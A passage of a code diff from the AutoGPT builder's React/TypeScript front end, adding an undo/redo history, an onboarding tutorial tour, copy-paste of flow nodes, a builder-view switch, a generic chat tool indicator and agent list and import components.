oldValues: { [key: string]: any };
newValues: { [key: string]: any };
};
type UpdateNodePositionPayload = {
nodeId: string;
oldPosition: { x: number; y: number };
newPosition: { x: number; y: number };
};
type ActionPayload =
| AddNodePayload
| DeleteNodePayload
| AddEdgePayload
| DeleteEdgePayload
| UpdateNodePayload
| MoveNodePayload
| UpdateInputPayload
| UpdateNodePositionPayload;
type Action = {
type: ActionType;
payload: ActionPayload;
undo: () => void;
redo: () => void;
};
class History {
private past: Action[] = [];
private future: Action[] = [];
push(action: Action) {
this.past.push(action);
this.future = [];
}
undo() {
const action = this.past.pop();
if (action) {
action.undo();
this.future.push(action);
}
}
redo() {
const action = this.future.pop();
if (action) {
action.redo();
this.past.push(action);
}
}
canUndo(): boolean {
return this.past.length > 0;
}
canRedo(): boolean {
return this.future.length > 0;
}
clear() {
this.past = [];
this.future = [];
}
getHistoryState() {
return {
past: [...this.past],
future: [...this.future],
};
}
}
export const history = new History();

View File

@@ -0,0 +1,569 @@
import Shepherd from "shepherd.js";
import "shepherd.js/dist/css/shepherd.css";
import { Key, storage } from "@/services/storage/local-storage";
import { analytics } from "@/services/analytics";
export const startTutorial = (
emptyNodeList: (forceEmpty: boolean) => boolean,
setPinBlocksPopover: (value: boolean) => void,
setPinSavePopover: (value: boolean) => void,
) => {
const tour = new Shepherd.Tour({
useModalOverlay: true,
defaultStepOptions: {
cancelIcon: { enabled: true },
scrollTo: { behavior: "smooth", block: "center" },
},
});
// CSS classes for disabling and highlighting blocks
const disableClass = "disable-blocks";
const highlightClass = "highlight-block";
let isConnecting = false;
// Helper function to disable all blocks except the target block
const disableOtherBlocks = (targetBlockSelector: string) => {
document.querySelectorAll('[data-id^="block-card-"]').forEach((block) => {
block.classList.toggle(disableClass, !block.matches(targetBlockSelector));
block.classList.toggle(
highlightClass,
block.matches(targetBlockSelector),
);
});
};
// Helper function to enable all blocks
const enableAllBlocks = () => {
document.querySelectorAll('[data-id^="block-card-"]').forEach((block) => {
block.classList.remove(disableClass, highlightClass);
});
};
// Inject CSS for disabling and highlighting blocks
const injectStyles = () => {
const style = document.createElement("style");
style.textContent = `
.${disableClass} {
pointer-events: none;
opacity: 0.5;
}
.${highlightClass} {
background-color: #ffeb3b;
border: 2px solid #fbc02d;
transition: background-color 0.3s, border-color 0.3s;
}
`;
document.head.appendChild(style);
};
// Helper function to check if an element is present in the DOM
const waitForElement = (selector: string): Promise<void> => {
return new Promise((resolve) => {
const checkElement = () => {
if (document.querySelector(selector)) {
resolve();
} else {
setTimeout(checkElement, 10);
}
};
checkElement();
});
};
// Function to detect the correct connection and advance the tour
const detectConnection = () => {
const checkForConnection = () => {
const correctConnection = document.querySelector(
'[data-testid^="rf__edge-"]',
);
if (correctConnection) {
tour.show("press-run-again");
} else {
setTimeout(checkForConnection, 100);
}
};
checkForConnection();
};
// Define state management functions to handle connection state
function startConnecting() {
isConnecting = true;
}
function stopConnecting() {
isConnecting = false;
}
// Reset connection state when revisiting the step
function resetConnectionState() {
stopConnecting();
}
// Event handlers for mouse down and up to manage connection state
function handleMouseDown() {
startConnecting();
setTimeout(() => {
if (isConnecting) {
tour.next();
}
}, 100);
}
// Event handler for mouse up to check if the connection was successful
function handleMouseUp(event: { target: any }) {
const target = event.target;
const validConnectionPoint = document.querySelector(
'[data-testid^="rf__node-"]:nth-child(2) [data-id$="-a-target"]',
);
if (validConnectionPoint && !validConnectionPoint.contains(target)) {
setTimeout(() => {
if (!document.querySelector('[data-testid^="rf__edge-"]')) {
stopConnecting();
tour.show("connect-blocks-output");
}
}, 200);
} else {
stopConnecting();
}
}
// Define the fitViewToScreen function
const fitViewToScreen = () => {
const fitViewButton = document.querySelector(
".react-flow__controls-fitview",
) as HTMLButtonElement;
if (fitViewButton) {
fitViewButton.click();
}
};
injectStyles();
const warningText = emptyNodeList(false)
? ""
: "<br/><br/><b>Caution: Clicking next will start a tutorial and will clear the current flow.</b>";
tour.addStep({
id: "starting-step",
title: "Welcome to the Tutorial",
text: `This is the AutoGPT builder! ${warningText}`,
buttons: [
{
text: "Skip Tutorial",
action: () => {
tour.cancel(); // Ends the tour
storage.set(Key.SHEPHERD_TOUR, "skipped"); // Set the tutorial as skipped in local storage
},
classes: "shepherd-button-secondary", // Optionally add a class for styling the skip button differently
},
{
text: "Next",
action: () => {
emptyNodeList(true);
tour.next();
},
},
],
});
tour.addStep({
id: "open-block-step",
title: "Open Blocks Menu",
text: "Please click the block button to open the blocks menu.",
attachTo: {
element: '[data-id="blocks-control-popover-trigger"]',
on: "right",
},
advanceOn: {
selector: '[data-id="blocks-control-popover-trigger"]',
event: "click",
},
buttons: [],
});
tour.addStep({
id: "scroll-block-menu",
title: "Scroll Down or Search",
text: 'Scroll down or search in the blocks menu for the "Calculator Block" and press the block to add it.',
attachTo: {
element: '[data-id="blocks-control-popover-content"]',
on: "right",
},
buttons: [],
beforeShowPromise: () =>
waitForElement('[data-id="blocks-control-popover-content"]').then(() => {
disableOtherBlocks(
'[data-id="block-card-b1ab9b19-67a6-406d-abf5-2dba76d00c79"]',
);
}),
advanceOn: {
selector: '[data-id="block-card-b1ab9b19-67a6-406d-abf5-2dba76d00c79"]',
event: "click",
},
when: {
show: () => setPinBlocksPopover(true),
hide: enableAllBlocks,
},
});
tour.addStep({
id: "focus-new-block",
title: "New Block",
text: "This is the Calculator Block! Let's go over how it works.",
attachTo: { element: `[data-id="custom-node-1"]`, on: "left" },
beforeShowPromise: () => waitForElement('[data-id="custom-node-1"]'),
buttons: [
{
text: "Next",
action: tour.next,
},
],
when: {
show: () => {
setPinBlocksPopover(false);
setTimeout(() => {
fitViewToScreen();
}, 100);
},
},
});
tour.addStep({
id: "input-to-block",
title: "Input to the Block",
text: "This is the input pin for the block. You can input the output of other blocks here; this block takes numbers as input.",
attachTo: { element: '[data-nodeid="1"]', on: "left" },
buttons: [
{
text: "Back",
action: tour.back,
},
{
text: "Next",
action: tour.next,
},
],
});
tour.addStep({
id: "output-from-block",
title: "Output from the Block",
text: "This is the output pin for the block. You can connect this to another block to pass the output along.",
attachTo: { element: '[data-handlepos="right"]', on: "right" },
buttons: [
{
text: "Back",
action: tour.back,
},
{
text: "Next",
action: tour.next,
},
],
});
tour.addStep({
id: "select-operation-and-input",
title: "Select Operation and Input Numbers",
text: "Select any mathematical operation you'd like to perform, and enter numbers in both input fields.",
attachTo: { element: '[data-id="input-handles"]', on: "right" },
buttons: [
{
text: "Back",
action: tour.back,
},
{
text: "Next",
action: tour.next,
},
],
});
tour.addStep({
id: "press-initial-save-button",
title: "Press Save",
text: "First we need to save the flow before we can run it!",
attachTo: {
element: '[data-id="save-control-popover-trigger"]',
on: "left",
},
advanceOn: {
selector: '[data-id="save-control-popover-trigger"]',
event: "click",
},
buttons: [
{
text: "Back",
action: tour.back,
},
],
when: {
hide: () => setPinSavePopover(true),
},
});
tour.addStep({
id: "save-agent-details",
title: "Save the Agent",
text: "Enter a name for your agent, add an optional description, and then click 'Save agent' to save your flow.",
attachTo: {
element: '[data-id="save-control-popover-content"]',
on: "top",
},
buttons: [],
beforeShowPromise: () =>
waitForElement('[data-id="save-control-popover-content"]'),
advanceOn: {
selector: '[data-id="save-control-save-agent"]',
event: "click",
},
when: {
hide: () => setPinSavePopover(false),
},
});
tour.addStep({
id: "press-run",
title: "Press Run",
text: "Start your first flow by pressing the Run button!",
attachTo: {
element: '[data-tutorial-id="primary-action-run-agent"]',
on: "top",
},
advanceOn: {
selector: '[data-tutorial-id="primary-action-run-agent"]',
event: "click",
},
buttons: [],
beforeShowPromise: () =>
waitForElement('[data-tutorial-id="primary-action-run-agent"]'),
when: {
hide: () => {
setTimeout(() => {
fitViewToScreen();
}, 500);
},
},
});
tour.addStep({
id: "wait-for-processing",
title: "Processing",
text: "Let's wait for the block to finish being processed...",
attachTo: {
element: '[data-id^="badge-"][data-id$="-QUEUED"]',
on: "bottom",
},
buttons: [],
beforeShowPromise: () =>
waitForElement('[data-id^="badge-"][data-id$="-QUEUED"]').then(
fitViewToScreen,
),
when: {
show: () => {
waitForElement('[data-id^="badge-"][data-id$="-COMPLETED"]').then(
() => {
tour.next();
},
);
},
},
});
tour.addStep({
id: "check-output",
title: "Check the Output",
text: "Check here to see the output of the block after running the flow.",
attachTo: { element: '[data-id="latest-output"]', on: "top" },
beforeShowPromise: () =>
new Promise((resolve) => {
setTimeout(() => {
waitForElement('[data-id="latest-output"]').then(resolve);
}, 100);
}),
buttons: [
{
text: "Next",
action: tour.next,
},
],
when: {
show: () => {
fitViewToScreen();
},
},
});
tour.addStep({
id: "copy-paste-block",
title: "Copy and Paste the Block",
text: "Lets duplicate this block. Click and hold the block with your mouse, then press Ctrl+C (Cmd+C on Mac) to copy and Ctrl+V (Cmd+V on Mac) to paste.",
attachTo: { element: '[data-testid^="rf__node-"]', on: "top" },
buttons: [
{
text: "Back",
action: tour.back,
},
],
when: {
show: () => {
fitViewToScreen();
waitForElement('[data-testid^="rf__node-"]:nth-child(2)').then(() => {
tour.next();
});
},
},
});
tour.addStep({
id: "focus-second-block",
title: "Focus on the New Block",
text: "This is your copied Calculator Block. Now, lets move it to the side of the first block.",
attachTo: { element: '[data-testid^="rf__node-"]:nth-child(2)', on: "top" },
beforeShowPromise: () =>
waitForElement('[data-testid^="rf__node-"]:nth-child(2)'),
buttons: [
{
text: "Next",
action: tour.next,
},
],
});
tour.addStep({
id: "connect-blocks-output",
title: "Connect the Blocks: Output",
text: "Now, let's connect the output of the first Calculator Block to the input of the second Calculator Block. Drag from the output pin of the first block to the input pin (A) of the second block.",
attachTo: {
element:
'[data-testid^="rf__node-"]:first-child [data-id$="-result-source"]',
on: "bottom",
},
buttons: [
{
text: "Back",
action: tour.back,
},
],
beforeShowPromise: () => {
return waitForElement(
'[data-testid^="rf__node-"]:first-child [data-id$="-result-source"]',
);
},
when: {
show: () => {
fitViewToScreen();
resetConnectionState(); // Reset state when revisiting this step
tour.modal.show();
const outputPin = document.querySelector(
'[data-testid^="rf__node-"]:first-child [data-id$="-result-source"]',
);
if (outputPin) {
outputPin.addEventListener("mousedown", handleMouseDown);
}
},
hide: () => {
const outputPin = document.querySelector(
'[data-testid^="rf__node-"]:first-child [data-id$="-result-source"]',
);
if (outputPin) {
outputPin.removeEventListener("mousedown", handleMouseDown);
}
},
},
});
tour.addStep({
id: "connect-blocks-input",
title: "Connect the Blocks: Input",
text: "Now, connect the output to the input pin of the second block (A).",
attachTo: {
element: '[data-testid^="rf__node-"]:nth-child(2) [data-id$="-a-target"]',
on: "top",
},
buttons: [],
beforeShowPromise: () => {
return waitForElement(
'[data-testid^="rf__node-"]:nth-child(2) [data-id$="-a-target"]',
).then(() => {
detectConnection();
});
},
when: {
show: () => {
tour.modal.show();
document.addEventListener("mouseup", handleMouseUp, true);
},
hide: () => {
tour.modal.hide();
document.removeEventListener("mouseup", handleMouseUp, true);
},
},
});
tour.addStep({
id: "press-run-again",
title: "Press Run Again",
text: "Now, press the Run button again to execute the flow with the new Calculator Block added!",
attachTo: {
element: '[data-tutorial-id="primary-action-run-agent"]',
on: "top",
},
advanceOn: {
selector: '[data-tutorial-id="primary-action-run-agent"]',
event: "click",
},
buttons: [],
beforeShowPromise: () =>
waitForElement('[data-tutorial-id="primary-action-run-agent"]'),
when: {
hide: () => {
setTimeout(() => {
fitViewToScreen();
}, 500);
},
},
});
tour.addStep({
id: "congratulations",
title: "Congratulations!",
text: "You have successfully created your first flow. Watch for the outputs in the blocks!",
beforeShowPromise: () => waitForElement('[data-id="latest-output"]'),
when: {
show: () => tour.modal.hide(),
},
buttons: [
{
text: "Finish",
action: tour.complete,
},
],
});
// Unpin blocks and save menu when the tour is completed or canceled
tour.on("complete", () => {
setPinBlocksPopover(false);
setPinSavePopover(false);
storage.set(Key.SHEPHERD_TOUR, "completed"); // Optionally mark the tutorial as completed
});
for (const step of tour.steps) {
step.on("show", () => {
"use client";
console.debug("sendTutorialStep");
analytics.sendGAEvent("event", "tutorial_step_shown", { value: step.id });
});
}
tour.on("cancel", () => {
setPinBlocksPopover(false);
setPinSavePopover(false);
storage.set(Key.SHEPHERD_TOUR, "canceled"); // Optionally mark the tutorial as canceled
});
tour.start();
};

View File

@@ -0,0 +1,142 @@
import { useCallback } from "react";
import { Node, Edge, useReactFlow } from "@xyflow/react";
import { Key, storage } from "@/services/storage/local-storage";
import { ConnectedEdge } from "./CustomNode/CustomNode";
interface CopyableData {
nodes: Node[];
edges: Edge[];
}
export function useCopyPaste(getNextNodeId: () => string) {
const { setNodes, addEdges, getNodes, getEdges, getViewport } =
useReactFlow();
const handleCopyPaste = useCallback(
(event: KeyboardEvent) => {
if (event.ctrlKey || event.metaKey) {
if (event.key === "c" || event.key === "C") {
const selectedNodes = getNodes().filter((node) => node.selected);
const selectedNodeIds = new Set(selectedNodes.map((node) => node.id));
// Only copy edges where both source and target nodes are selected
const selectedEdges = getEdges().filter(
(edge) =>
edge.selected &&
selectedNodeIds.has(edge.source) &&
selectedNodeIds.has(edge.target),
);
const copiedData: CopyableData = {
nodes: selectedNodes.map((node) => ({
...node,
data: {
...node.data,
connections: node.data.connections || [], // Preserve connections
},
})),
edges: selectedEdges,
};
storage.set(Key.COPIED_FLOW_DATA, JSON.stringify(copiedData));
}
if (event.key === "v" || event.key === "V") {
const copiedDataString = storage.get(Key.COPIED_FLOW_DATA);
if (copiedDataString) {
const copiedData = JSON.parse(copiedDataString) as CopyableData;
const oldToNewIdMap: Record<string, string> = {};
// Get fresh viewport values at paste time to ensure correct positioning
const { x, y, zoom } = getViewport();
const viewportCenter = {
x: (window.innerWidth / 2 - x) / zoom,
y: (window.innerHeight / 2 - y) / zoom,
};
let minX = Infinity,
minY = Infinity,
maxX = -Infinity,
maxY = -Infinity;
copiedData.nodes.forEach((node: Node) => {
minX = Math.min(minX, node.position.x);
minY = Math.min(minY, node.position.y);
maxX = Math.max(maxX, node.position.x);
maxY = Math.max(maxY, node.position.y);
});
const offsetX = viewportCenter.x - (minX + maxX) / 2;
const offsetY = viewportCenter.y - (minY + maxY) / 2;
const pastedNodes = copiedData.nodes.map((node: Node) => {
const newNodeId = getNextNodeId();
oldToNewIdMap[node.id] = newNodeId;
return {
...node,
id: newNodeId, // Generate unique ID for the pasted node
selected: true, // Select the pasted nodes so they're visible
position: {
x: node.position.x + offsetX,
y: node.position.y + offsetY,
},
data: {
...node.data,
backend_id: undefined, // Clear backend_id so the new node.id is used when saving
connections: node.data.connections || [], // Preserve connections
status: undefined,
executionResults: undefined,
},
};
});
const pastedEdges = copiedData.edges.map((edge) => {
const newSourceId = oldToNewIdMap[edge.source] ?? edge.source;
const newTargetId = oldToNewIdMap[edge.target] ?? edge.target;
return {
...edge,
id: `${newSourceId}_${edge.sourceHandle}_${newTargetId}_${edge.targetHandle}_${Date.now()}`,
source: newSourceId,
target: newTargetId,
};
});
setNodes((existingNodes) => [
...existingNodes.map((node) => ({ ...node, selected: false })),
...pastedNodes,
]);
addEdges(pastedEdges);
setNodes((nodes) => {
return nodes.map((node) => {
const nodeConnections = getEdges()
.filter(
(edge: Edge) =>
edge.source === node.id || edge.target === node.id,
)
.map(
(edge: Edge): ConnectedEdge => ({
id: edge.id,
source: edge.source,
target: edge.target,
sourceHandle: edge.sourceHandle!,
targetHandle: edge.targetHandle!,
}),
);
return {
...node,
data: {
...node.data,
connections: nodeConnections,
},
};
});
});
}
}
}
},
[setNodes, addEdges, getNodes, getEdges, getNextNodeId, getViewport],
);
return handleCopyPaste;
}

View File

@@ -1,13 +1,64 @@
"use client";
import { ReactFlowProvider } from "@xyflow/react";
import { Flow } from "./components/FlowEditor/Flow/Flow";
export default function BuilderPage() {
import FlowEditor from "@/app/(platform)/build/components/legacy-builder/Flow/Flow";
import { useOnboarding } from "@/providers/onboarding/onboarding-provider";
// import LoadingBox from "@/components/__legacy__/ui/loading";
import { GraphID } from "@/lib/autogpt-server-api/types";
import { ReactFlowProvider } from "@xyflow/react";
import { useSearchParams } from "next/navigation";
import { useEffect } from "react";
import { BuilderViewTabs } from "./components/BuilderViewTabs/BuilderViewTabs";
import { Flow } from "./components/FlowEditor/Flow/Flow";
import { useBuilderView } from "./useBuilderView";
function BuilderContent() {
const query = useSearchParams();
const { completeStep } = useOnboarding();
useEffect(() => {
completeStep("BUILDER_OPEN");
}, [completeStep]);
const _graphVersion = query.get("flowVersion");
const graphVersion = _graphVersion ? parseInt(_graphVersion) : undefined;
return (
<div className="relative h-full w-full">
<ReactFlowProvider>
<Flow />
</ReactFlowProvider>
</div>
<FlowEditor
className="flex h-full w-full"
flowID={(query.get("flowID") as GraphID | null) ?? undefined}
flowVersion={graphVersion}
/>
);
}
export default function BuilderPage() {
const {
isSwitchEnabled,
selectedView,
setSelectedView,
isNewFlowEditorEnabled,
} = useBuilderView();
// Switch is temporary, we will remove it once our new flow editor is ready
if (isSwitchEnabled) {
return (
<div className="relative h-full w-full">
<BuilderViewTabs value={selectedView} onChange={setSelectedView} />
{selectedView === "new" ? (
<ReactFlowProvider>
<Flow />
</ReactFlowProvider>
) : (
<BuilderContent />
)}
</div>
);
}
return isNewFlowEditorEnabled ? (
<ReactFlowProvider>
<Flow />
</ReactFlowProvider>
) : (
<BuilderContent />
);
}

View File

@@ -0,0 +1,44 @@
import { Flag, useGetFlag } from "@/services/feature-flags/use-get-flag";
import { usePathname, useRouter, useSearchParams } from "next/navigation";
import { useEffect, useMemo } from "react";
import { BuilderView } from "./components/BuilderViewTabs/BuilderViewTabs";
export function useBuilderView() {
const isNewFlowEditorEnabled = useGetFlag(Flag.NEW_FLOW_EDITOR);
const isBuilderViewSwitchEnabled = useGetFlag(Flag.BUILDER_VIEW_SWITCH);
const router = useRouter();
const pathname = usePathname();
const searchParams = useSearchParams();
const currentView = searchParams.get("view");
const defaultView = "old";
const selectedView = useMemo<BuilderView>(() => {
if (currentView === "new" || currentView === "old") return currentView;
return defaultView;
}, [currentView, defaultView]);
useEffect(() => {
if (isBuilderViewSwitchEnabled === true) {
if (currentView !== "new" && currentView !== "old") {
const params = new URLSearchParams(searchParams);
params.set("view", defaultView);
router.replace(`${pathname}?${params.toString()}`);
}
}
// eslint-disable-next-line react-hooks/exhaustive-deps
}, [isBuilderViewSwitchEnabled, defaultView, pathname, router, searchParams]);
const setSelectedView = (value: BuilderView) => {
const params = new URLSearchParams(searchParams);
params.set("view", value);
router.push(`${pathname}?${params.toString()}`);
};
return {
isSwitchEnabled: isBuilderViewSwitchEnabled === true,
selectedView,
setSelectedView,
isNewFlowEditorEnabled: Boolean(isNewFlowEditorEnabled),
} as const;
}

View File

@@ -20,6 +20,7 @@ import { FindBlocksTool } from "../../tools/FindBlocks/FindBlocks";
import { RunAgentTool } from "../../tools/RunAgent/RunAgent";
import { RunBlockTool } from "../../tools/RunBlock/RunBlock";
import { SearchDocsTool } from "../../tools/SearchDocs/SearchDocs";
import { GenericTool } from "../../tools/GenericTool/GenericTool";
import { ViewAgentOutputTool } from "../../tools/ViewAgentOutput/ViewAgentOutput";
// ---------------------------------------------------------------------------
@@ -255,6 +256,16 @@ export const ChatMessagesContainer = ({
/>
);
default:
// Render a generic tool indicator for SDK built-in
// tools (Read, Glob, Grep, etc.) or any unrecognized tool
if (part.type.startsWith("tool-")) {
return (
<GenericTool
key={`${message.id}-${i}`}
part={part as ToolUIPart}
/>
);
}
return null;
}
})}

View File

@@ -0,0 +1,63 @@
"use client";
import { ToolUIPart } from "ai";
import { GearIcon } from "@phosphor-icons/react";
import { MorphingTextAnimation } from "../../components/MorphingTextAnimation/MorphingTextAnimation";
interface Props {
part: ToolUIPart;
}
function extractToolName(part: ToolUIPart): string {
// ToolUIPart.type is "tool-{name}", extract the name portion.
return part.type.replace(/^tool-/, "");
}
function formatToolName(name: string): string {
// "search_docs" → "Search docs", "Read" → "Read"
return name.replace(/_/g, " ").replace(/^\w/, (c) => c.toUpperCase());
}
function getAnimationText(part: ToolUIPart): string {
const label = formatToolName(extractToolName(part));
switch (part.state) {
case "input-streaming":
case "input-available":
return `Running ${label}`;
case "output-available":
return `${label} completed`;
case "output-error":
return `${label} failed`;
default:
return `Running ${label}`;
}
}
export function GenericTool({ part }: Props) {
const isStreaming =
part.state === "input-streaming" || part.state === "input-available";
const isError = part.state === "output-error";
return (
<div className="py-2">
<div className="flex items-center gap-2 text-sm text-muted-foreground">
<GearIcon
size={14}
weight="regular"
className={
isError
? "text-red-500"
: isStreaming
? "animate-spin text-neutral-500"
: "text-neutral-400"
}
/>
<MorphingTextAnimation
text={getAnimationText(part)}
className={isError ? "text-red-500" : undefined}
/>
</div>
</div>
);
}

View File

@@ -0,0 +1,180 @@
import { GraphExecutionMeta, LibraryAgent } from "@/lib/autogpt-server-api";
import React from "react";
import {
Card,
CardContent,
CardHeader,
CardTitle,
} from "@/components/__legacy__/ui/card";
import { Button } from "@/components/__legacy__/ui/button";
import { TextRenderer } from "@/components/__legacy__/ui/render";
import Link from "next/link";
import {
Dialog,
DialogContent,
DialogHeader,
DialogTrigger,
} from "@/components/__legacy__/ui/dialog";
import {
DropdownMenu,
DropdownMenuContent,
DropdownMenuItem,
DropdownMenuTrigger,
} from "@/components/__legacy__/ui/dropdown-menu";
import { ChevronDownIcon, EnterIcon } from "@radix-ui/react-icons";
import {
Table,
TableBody,
TableCell,
TableHead,
TableHeader,
TableRow,
} from "@/components/__legacy__/ui/table";
import { formatDistanceToNow } from "date-fns";
import { DialogTitle } from "@/components/__legacy__/ui/dialog";
import { AgentImportForm } from "./AgentImportForm";
export const AgentFlowList = ({
flows,
executions,
selectedFlow,
onSelectFlow,
className,
}: {
flows: LibraryAgent[];
executions?: GraphExecutionMeta[];
selectedFlow: LibraryAgent | null;
onSelectFlow: (f: LibraryAgent) => void;
className?: string;
}) => {
return (
<Card className={className}>
<CardHeader className="flex-row items-center justify-between space-x-3 space-y-0">
<CardTitle>Agents</CardTitle>
<div className="flex items-center">
{/* Split "Create" button */}
<Button variant="outline" className="rounded-r-none">
<Link href="/build">Create</Link>
</Button>
<Dialog>
{/* https://ui.shadcn.com/docs/components/dialog#notes */}
<DropdownMenu>
<DropdownMenuTrigger asChild>
<Button
variant="outline"
className={"rounded-l-none border-l-0 px-2"}
data-testid="create-agent-dropdown"
>
<ChevronDownIcon />
</Button>
</DropdownMenuTrigger>
<DropdownMenuContent>
<DialogTrigger asChild>
<DropdownMenuItem data-testid="import-agent-from-file">
<EnterIcon className="mr-2" /> Import from file
</DropdownMenuItem>
</DialogTrigger>
</DropdownMenuContent>
</DropdownMenu>
<DialogContent>
<DialogHeader>
<DialogTitle className="sr-only">Import Agent</DialogTitle>
<h2 className="text-lg font-semibold">
Import an Agent from a file
</h2>
</DialogHeader>
<AgentImportForm />
</DialogContent>
</Dialog>
</div>
</CardHeader>
<CardContent>
<Table>
<TableHeader>
<TableRow>
<TableHead>Name</TableHead>
{/* <TableHead>Status</TableHead> */}
{/* <TableHead>Last updated</TableHead> */}
{executions && (
<TableHead className="md:hidden lg:table-cell">
# of runs
</TableHead>
)}
{executions && <TableHead>Last run</TableHead>}
</TableRow>
</TableHeader>
<TableBody data-testid="agent-flow-list-body">
{flows
.map((flow) => {
let runCount = 0,
lastRun: GraphExecutionMeta | null = null;
if (executions) {
const _flowRuns = executions.filter(
(r) => r.graph_id == flow.graph_id,
);
runCount = _flowRuns.length;
lastRun =
runCount == 0
? null
: _flowRuns.reduce((a, c) => {
const aTime = a.started_at?.getTime() ?? 0;
const cTime = c.started_at?.getTime() ?? 0;
return aTime > cTime ? a : c;
});
}
return { flow, runCount, lastRun };
})
.sort((a, b) => {
if (!a.lastRun && !b.lastRun) return 0;
if (!a.lastRun) return 1;
if (!b.lastRun) return -1;
const bTime = b.lastRun.started_at?.getTime() ?? 0;
const aTime = a.lastRun.started_at?.getTime() ?? 0;
return bTime - aTime;
})
.map(({ flow, runCount, lastRun }) => (
<TableRow
key={flow.id}
data-testid={flow.id}
data-name={flow.name}
className="cursor-pointer"
onClick={() => onSelectFlow(flow)}
data-state={selectedFlow?.id == flow.id ? "selected" : null}
>
<TableCell>
<TextRenderer value={flow.name} truncateLengthLimit={30} />
</TableCell>
{/* <TableCell><FlowStatusBadge status={flow.status ?? "active"} /></TableCell> */}
{/* <TableCell>
{flow.updatedAt ?? "???"}
</TableCell> */}
{executions && (
<TableCell className="md:hidden lg:table-cell">
{runCount}
</TableCell>
)}
{executions &&
(!lastRun ? (
<TableCell />
) : (
<TableCell title={lastRun.started_at?.toString() ?? ""}>
{lastRun.started_at
? formatDistanceToNow(lastRun.started_at, {
addSuffix: true,
})
: "—"}
</TableCell>
))}
</TableRow>
))}
</TableBody>
</Table>
</CardContent>
</Card>
);
};
export default AgentFlowList;

View File

@@ -0,0 +1,175 @@
import { z } from "zod";
import { cn } from "@/lib/utils";
import { useForm } from "react-hook-form";
import { zodResolver } from "@hookform/resolvers/zod";
import React, { useState } from "react";
import {
Form,
FormControl,
FormField,
FormItem,
FormLabel,
FormMessage,
} from "@/components/__legacy__/ui/form";
import { Input } from "@/components/__legacy__/ui/input";
import { Button } from "@/components/__legacy__/ui/button";
import { Textarea } from "@/components/__legacy__/ui/textarea";
import { EnterIcon } from "@radix-ui/react-icons";
import { useBackendAPI } from "@/lib/autogpt-server-api/context";
import {
Graph,
GraphCreatable,
sanitizeImportedGraph,
} from "@/lib/autogpt-server-api";
// Add this custom schema for File type
const fileSchema = z.custom<File>((val) => val instanceof File, {
message: "Must be a File object",
});
const formSchema = z.object({
agentFile: fileSchema,
agentName: z.string().min(1, "Agent name is required"),
agentDescription: z.string(),
importAsTemplate: z.boolean(),
});
export const AgentImportForm: React.FC<
React.FormHTMLAttributes<HTMLFormElement>
> = ({ className, ...props }) => {
const [agentObject, setAgentObject] = useState<GraphCreatable | null>(null);
const api = useBackendAPI();
const form = useForm<z.infer<typeof formSchema>>({
resolver: zodResolver(formSchema),
defaultValues: {
agentName: "",
agentDescription: "",
importAsTemplate: false,
},
});
function onSubmit(values: z.infer<typeof formSchema>) {
if (!agentObject) {
form.setError("root", { message: "No Agent object to save" });
return;
}
const payload: GraphCreatable = {
...agentObject,
name: values.agentName,
description: values.agentDescription,
is_active: !values.importAsTemplate,
};
api
.createGraph(payload, "upload")
.then((response) => {
const qID = "flowID";
window.location.href = `/build?${qID}=${response.id}`;
})
.catch((error) => {
const entity_type = "agent";
form.setError("root", {
message: `Could not create ${entity_type}: ${error}`,
});
});
}
return (
<Form {...form}>
<form
onSubmit={form.handleSubmit(onSubmit)}
className={cn("space-y-4", className)}
{...props}
>
<FormField
control={form.control}
name="agentFile"
render={({ field }) => (
<FormItem>
<FormLabel>Agent file</FormLabel>
<FormControl className="cursor-pointer">
<Input
type="file"
accept="application/json"
data-testid="import-agent-file-input"
onChange={(e) => {
const file = e.target.files?.[0];
if (file) {
field.onChange(file);
const reader = new FileReader();
// Attach parser to file reader
reader.onload = (event) => {
try {
const obj = JSON.parse(
event.target?.result as string,
);
if (
!["name", "description", "nodes", "links"].every(
(key) => key in obj && obj[key] != null,
)
) {
throw new Error(
"Invalid agent object in file: " +
JSON.stringify(obj, null, 2),
);
}
const graph = obj as Graph;
sanitizeImportedGraph(graph);
setAgentObject(graph);
form.setValue("agentName", graph.name);
form.setValue("agentDescription", graph.description);
} catch (error) {
console.error("Error loading agent file:", error);
}
};
// Load file
reader.readAsText(file);
}
}}
/>
</FormControl>
<FormMessage />
</FormItem>
)}
/>
<FormField
control={form.control}
name="agentName"
disabled={!agentObject}
render={({ field }) => (
<FormItem>
<FormLabel>Agent name</FormLabel>
<FormControl>
<Input {...field} data-testid="agent-name-input" />
</FormControl>
<FormMessage />
</FormItem>
)}
/>
<FormField
control={form.control}
name="agentDescription"
disabled={!agentObject}
render={({ field }) => (
<FormItem>
<FormLabel>Agent description</FormLabel>
<FormControl>
<Textarea {...field} data-testid="agent-description-input" />
</FormControl>
<FormMessage />
</FormItem>
)}
/>
<Button
type="submit"
className="w-full"
disabled={!agentObject}
data-testid="import-agent-submit"
>
<EnterIcon className="mr-2" /> Import & Edit
</Button>
</form>
</Form>
);
};

View File

@@ -0,0 +1,243 @@
import React, { useEffect, useState } from "react";
import {
Graph,
GraphExecutionMeta,
LibraryAgent,
} from "@/lib/autogpt-server-api";
import {
Card,
CardContent,
CardHeader,
CardTitle,
} from "@/components/__legacy__/ui/card";
import {
DropdownMenu,
DropdownMenuContent,
DropdownMenuLabel,
DropdownMenuRadioGroup,
DropdownMenuRadioItem,
DropdownMenuSeparator,
DropdownMenuTrigger,
} from "@/components/__legacy__/ui/dropdown-menu";
import { Button, buttonVariants } from "@/components/__legacy__/ui/button";
import {
ClockIcon,
ExitIcon,
Pencil2Icon,
PlayIcon,
TrashIcon,
} from "@radix-ui/react-icons";
import Link from "next/link";
import { exportAsJSONFile } from "@/lib/utils";
import {
Dialog,
DialogContent,
DialogHeader,
DialogTitle,
DialogDescription,
DialogFooter,
} from "@/components/__legacy__/ui/dialog";
import useAgentGraph from "@/hooks/useAgentGraph";
import { useBackendAPI } from "@/lib/autogpt-server-api/context";
import { FlowRunsStatus } from "./FlowRunsStatus";
import { RunnerInputDialog } from "../../build/components/legacy-builder/RunnerInputUI";
export const FlowInfo: React.FC<
React.HTMLAttributes<HTMLDivElement> & {
flow: LibraryAgent;
executions: GraphExecutionMeta[];
flowVersion?: number | "all";
refresh: () => void;
}
> = ({ flow, executions, flowVersion, refresh, ...props }) => {
const { savedAgent, saveAndRun, stopRun, isRunning } = useAgentGraph(
flow.graph_id,
flow.graph_version,
undefined,
false,
);
const api = useBackendAPI();
const [flowVersions, setFlowVersions] = useState<Graph[] | null>(null);
const [selectedVersion, setSelectedFlowVersion] = useState(
flowVersion ?? "all",
);
